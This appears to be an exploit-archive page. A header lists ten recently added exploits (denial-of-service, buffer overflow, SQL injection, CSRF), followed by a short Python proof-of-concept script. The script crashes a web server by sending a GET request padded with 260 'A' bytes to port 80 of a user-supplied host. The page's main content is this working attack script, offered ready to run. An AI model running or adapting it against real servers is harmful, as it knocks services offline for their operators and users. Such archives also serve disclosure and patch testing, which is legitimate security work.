
10 changes to exploits/shellcodes Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC) Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC) Savant Web Server 3.1 - Denial of-Service (PoC) ALLPlayer 7.5 - Denial of-Service (PoC) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR) WinGate 9.4.1.5998 - Insecure Folder Permissions HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
26 lines
No EOL
503 B
Python
Executable file
26 lines
No EOL
503 B
Python
Executable file
#!/usr/bin/python
|
|
import socket
|
|
import sys
|
|
from struct import pack
|
|
|
|
try:
|
|
server = sys.argv[1]
|
|
port = 80
|
|
size = 260
|
|
|
|
httpMethod = b"GET /"
|
|
inputBuffer = b"\x41" * size
|
|
httpEndRequest = b"\r\n\r\n"
|
|
|
|
buf = httpMethod + inputBuffer + httpEndRequest
|
|
|
|
print("Sending evil buffer...")
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((server, port))
|
|
s.send(buf)
|
|
s.close()
|
|
|
|
print("Done!")
|
|
|
|
except socket.error:
|
|
print("Could not connect!") |